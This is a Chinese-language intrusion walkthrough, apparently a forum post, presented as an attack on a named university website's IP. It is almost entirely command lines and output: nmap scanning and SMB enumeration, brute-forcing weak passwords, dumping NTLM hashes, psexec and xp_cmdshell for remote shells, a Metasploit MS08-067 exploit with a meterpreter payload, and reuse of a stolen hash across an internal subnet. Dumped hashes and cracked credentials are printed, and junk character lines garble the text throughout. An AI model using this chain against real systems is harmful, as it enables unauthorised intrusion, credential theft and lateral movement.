广西师范网站http://202.103.242.241/
8 o8 r5 K. l4 q
root@bt:~# nmap -sS -sV 202.103.242.241
8 T! m% v: c6 v- o1 H' ~6 X) |$ n9 O8 Z+ j2 A! a
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
& U$ y1 `4 D% @/ D3 t
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
& I9 f. Y6 ^4 A1 b) p! T8 ?, _: l/ @2 {* R) j
Not shown: 993 closed ports
% k* t6 }5 C8 n/ ?: n
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
4 @; h J: E8 s1 F( K3 z
139/tcp open netbios-ssn
& m) }# h, ~- X% R3 A" {. G' o* g# ?$ W0 C4 @$ [2 S
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
! G( r2 }8 _6 g2 m
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
/ x1 \3 x0 }( j% A9 Q$ D
3372/tcp open msdtc?
* b: S$ w, c3 ^. f' w- @: E
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r(
7 N$ r( L+ ?( T; V7 K
SF:GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
Q3 F% N1 E& Y7 A5 `
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
( T1 G5 o0 l+ x. _. E9 O) e0 o/ w. L. ]6 m$ n) ^# y
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
6 n. x3 p5 u1 w% K! [
SF:ptions,6,"hO\n\x000Z");
# P2 n4 f& {2 ^5 v# V$ D; N; E, H6 E+ T) w: a
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 t- e9 L( Q" ]- R# ]# o7 b3 w' Q. G
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
: Z" u: u9 M: P( j" c h1 i
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
) u2 I2 G( Y! ^: @
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
1 S6 K/ i7 \7 Q0 c( Y
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
) ~: i& v( M* _0 e/ u2 m7 [5 g* g2 J4 `5 |4 J
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
3 i2 m& L/ f; B- N
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
, o+ W* c# q3 i: |! W# {# V
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
$ J1 N: Y2 I' Z9 l/ p/ W8 u; A" `9 g+ C' p& I
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
- h- R1 h0 b# s& ^: ]" v4 S2 m- [4 K6 u* { C8 [5 t
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
; N( R! R2 o. c7 ?) b" y
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
. R1 w5 Q2 }; }7 _+ W2 J- I* K
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
# Y! u, I5 n0 R; a( h$ \! M+ L! e! U) r9 ~5 ?/ i- y
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
1 A9 u! [( `* ^& B o [
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
/ E9 w% Z, m! j4 E& h2 _$ o" s- C& L# f W. k( H
//此乃使用脚本扫描远程机器所存在的账户名
! Q5 j* b7 M5 j7 c. x6 F2 `" Y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
, Q0 o8 d" U b
Nmap scan report for bogon (202.103.242.241)
0 l: A! L! E0 j& @8 s) R7 K) O* a/ s3 ^( k8 Z& y$ \; l
Host is up (0.00038s latency).
Not shown: 993 closed ports
' ?% t& E s: Q% U
PORT STATE SERVICE
$ o$ A" P7 m9 \, W" _% B6 h
135/tcp open msrpc
) h# A3 Q! F% K% _; `: H& ~, m
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1 M: W: b$ q' ~4 M0 J- Z# F" m5 [9 K" X7 E. g
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
& c6 X8 W& ~. G) g3 W+ I3 W) Y/ z, }9 v- S' E- `6 \' y5 y9 O5 H
3389/tcp open ms-term-serv
- x* k2 q. {' D+ m" s" ]3 U8 O3 y E) e8 W% G; h
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( P9 l- o" _; { K6 S& I# ] g
Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
; t/ ^0 G8 {; ^5 v" J$ @8 ?5 M- v6 F) H2 Y+ g; h
//查看共享
- r! H/ n- i! S+ b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
- q5 W+ o& K D; q
Nmap scan report for bogon (202.103.242.241)
% S6 b7 h6 |( Z1 Y. }" K
Host is up (0.00035s latency).
3 w6 L: {& P: ~- F8 L% ?. L& ~
Not shown: 993 closed ports
) r, {5 Y6 k; f8 m s0 y" r6 x. s! y& z# j# s. m) y
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
4 ^/ k+ z& C+ ]/ c5 v# M
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5 G: C7 w6 g- L0 v5 n/ w" ^
1026/tcp open LSA-or-nterm
# E6 a) s, X) s, Q
3372/tcp open msdtc
9 p4 j7 N& ^! t. F/ X0 _
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
1 M# P9 H8 f6 F& T& t/ m. p
Host script results:
: T& C6 C9 A+ A j$ ^3 M9 _) O; g7 K; X o; Z/ s& v$ e
| smb-enum-shares:
| ADMIN$
% z; z1 y3 S$ w O! U S0 I4 ^. t
| Anonymous access: <none>
' ?, I$ S; N0 v+ `* ~
| C$
4 q' F/ l! C; Y t
" P/ `* v0 P9 w$ P| Anonymous access: <none>
& \9 \1 A/ Y/ F( v0 l
| IPC$
|_ Anonymous access: READ
$ X2 e9 O1 d" z( Y2 E" A+ B( t+ S* @) o3 L! j
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
3 W& E6 Q, Q( M( K0 J# E1 c
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
Z6 V6 p+ M( H3 S6 F6 q" _# U2 @( k
//获取用户密码
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
3 y, W! m7 s+ y/ F, P$ X7 T8 ^; _1 V4 m6 Q
Nmap scan report for bogon (202.103.242.241)
5 c0 W$ W. T( h* x: N% _
Host is up (0.00041s latency).
Not shown: 993 closed ports
2 N) f* F$ D5 Y+ U4 L2 L8 E m6 @' b, J% o
PORT STATE SERVICE
" K7 k, P r! i B1 S2 l( J9 }135/tcp open msrpc
% `( d, ^, @! ^$ W+ p1 u% m. i% B/ u x- X; K
139/tcp open netbios-ssn
445/tcp open microsoft-ds
# q5 z$ W9 h( y* u; X8 O; |
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
; [: n* E, Z& S6 s) ?2 p) x/ j
3372/tcp open msdtc
0 r" e1 T8 w7 L, u1 `3 l
3389/tcp open ms-term-serv
- _1 E2 f7 _. n/ A* e4 d0 k4 Q% O, x" d# ^ H! G
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
+ ~) @0 ]8 s, Y( T' ]. s' h; n$ ~9 t& w$ @( r. X
Host script results:
4 ]6 p5 M9 {( E. C3 {6 S! F) ]& b% [, a" X5 J9 k# h1 T
| smb-brute:
: {; b) z3 `' p O
administrator:<blank> => Login was successful
+ J/ l/ F7 E; [ x
|_ test:123456 => Login was successful
% {' i% P. X: o, t( s" Q( ` w+ z: i* d
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
: r6 G6 f( h( J3 e y9 i: f1 `' v; K) ?; r% L6 X; @/ ]
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
. K/ Z: c/ E+ z; @" q
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
) V9 U7 Z/ M$ Y% j8 L, A7 J2 K: u9 y" i* d5 R: F D8 O
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
5 M& T$ _+ e3 {1 Z1 o( A F2 s- o1 }$ f: P7 u$ w5 g" w
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
, E) O/ }/ B8 N5 U* z* h# n
Nmap scan report for bogon (202.103.242.241)
" z" j" T) K* s+ ^) g( E- u; L" }% xHost is up (0.0012s latency).
+ P0 n6 z& @4 }3 Q9 b
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
; P2 G" f" @" I }
445/tcp open microsoft-ds
7 d6 c1 g; G: _- i2 F
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
5 [: j. N: T% n0 Y7 ^5 b" r z6 `
Host script results:
: O3 _2 O- c2 ]
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
1 q! [1 F8 t& H$ n+ D# A, V
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
8 \/ G/ V# p$ x+ f( T. P& k- p9 p3 q: [% ]: K, o; A* P2 u
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
6 U: X% q1 \: W( a1 E3 U5 z- R' u( } o* Z* O
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
) V3 M" Q+ o0 ]# D2 h4 Z
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe //获取一个cmdshell
PsExec v1.55 - Execute processes remotely
1 ] u0 g2 o! U6 \! X) v
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com
5 Q5 L _/ P9 k* p' {. z: |; _ Y" k
Microsoft Windows 2000 [Version 5.00.2195]
" z9 X, Y# F O9 m# X0 v# |& h
(C) 版权所有 1985-2000 Microsoft Corp.
7 X+ @ T2 X6 i3 Q% S4 Y8 w, y
" m8 c. o( [, |4 p" [: ~; hC:\WINNT\system32>ipconfig7 }7 h' l& o/ g& _$ m
Windows 2000 IP Configuration
! m9 ?' z7 s( Q$ F/ D3 v8 [& N) {* i( b+ v# R3 j
Ethernet adapter 本地连接:
' z& R& [ h/ S( k2 l5 d& I- G0 Z$ V5 J6 \ H
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
" v& [, L7 p& ~8 e$ e7 [+ I
Subnet Mask . . . . . . . . . . . : 255.255.255.0
- _5 [5 b& b4 {- P& Y2 W, E$ w
Default Gateway . . . . . . . . . : 202.103.1.13
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" //远程登录sa执行命令
6 p3 n% c. J: j. v
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
3 I" P' v9 q" l" Y; V( u0 h- E5 @) c/ N
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
7 [! ?9 O5 D& J6 y8 _
Nmap scan report for bogon (202.103.242.241)
& h) }$ q" l" ?
Host is up (0.00046s latency).
0 G/ |+ b: C, Y0 r0 d
Not shown: 993 closed ports
( V1 G. k3 C) J* \
PORT STATE SERVICE
0 l1 ^9 n; d: ^8 g+ G) b+ V" j
135/tcp open msrpc
t7 o& K2 B' F1 y# P
139/tcp open netbios-ssn
* k W, V. ?( n1 ^4 d+ w
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
" ]7 e0 q. e: z) H$ H8 x& Z0 l
1026/tcp open LSA-or-nterm
+ p# B* |3 e2 S5 Q
3372/tcp open msdtc
O, [4 j+ ?# [4 p4 c: B/ H) w
3389/tcp open ms-term-serv
: A2 n: h8 f4 [) {! `
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
8 U" Z% `- L* i# D* W- L" B7 v1 ?; P8 }
Host script results:
) C4 v$ M |/ l* w8 N4 q( v) I% v7 U* i( x$ k
| smb-check-vulns:
8 p( J1 `0 A- T$ D9 O
|_ MS08-067: VULNERABLE
l [/ G5 g2 N( r6 |) M. `: i% N! y- e; f+ m
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
/ B7 h K7 i8 T9 T( l, |
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
8 q) P& L2 @! f) n, s; c9 R; _
msf > search ms08
- d* D! D8 f H4 n# R% U/ h
msf > use exploit/windows/smb/ms08_067_netapi
% h# x* V0 p. A/ f3 u
msf exploit(ms08_067_netapi) > show options
8 `% S9 x8 q& L1 ~8 j
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
) k8 O0 P4 P( n
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
5 D/ u, J4 V8 v: \ z* G" o) L
msf exploit(ms08_067_netapi) > exploit
( l. G7 l8 b9 C! L- j" p* a5 j, m4 G" t7 D& Z. \" e1 A
meterpreter >
" i5 `9 h: b, B1 M& B5 i' i. D4 @2 ~) \7 }: a+ A4 W1 r
Background session 2? [y/N] (ctrl+z)
9 k/ Y, N' S! I
msf exploit(ms08_067_netapi) > sessions -l
7 f7 ~1 ~& x1 e3 {" R) g
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
" c. a4 h: d. ^
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
$ W" ?3 b/ p1 {* A1 j/ k% T5 G" Q$ s( _( V, ~" c& S' i
44EFCE164AB921CAAAD3B435B51404EE
2 d7 ^7 r. Q+ h" ]1 ~: m+ G
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
8 b* [+ c& E/ g2 H4 e$ X1 I
//利用用户名跟获取的hash尝试对整段内网进行登录
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
3 s0 H3 A8 N& B/ T
Not shown: 993 closed ports
' O! }; M1 P4 [& h
" [+ D y ?; M+ b2 `9 H5 Y: D# EPORT STATE SERVICE
; D# }5 j& E# H1 z
135/tcp open msrpc
. f* Q+ X" v/ v+ B; [& Z& i7 j4 d9 O
139/tcp open netbios-ssn
6 P4 x" C, N/ u, j
445/tcp open microsoft-ds
) R9 b3 W& e/ D2 `6 [% j4 t- v: X J0 x1 r/ }% Q8 S& N. Z$ S
1025/tcp open NFS-or-IIS
0 Z2 q# q4 @0 k, e, Z, M' z9 U8 L* P( R' Q; K! L0 w& x- m
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
* M. W Q3 C: b! {) k/ x$ U
3389/tcp open ms-term-serv
6 `! k: G5 {9 r! H* r
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
5 w; x+ M, ~5 W# y2 g( {, _- T `( ]9 F& Y* I- n
Host script results:
" n( Y9 \# U" B8 h' p9 r
| smb-brute:
6 k( i, \- [; r% k+ p, U9 X% S7 k
|_ administrator:<blank> => Login was successful
' [# m% r& b; U* Q6 m+ z/ r$ y
攻击成功,一个简单的msf+nmap攻击~~
6 y0 m" H( i2 h& V( ] |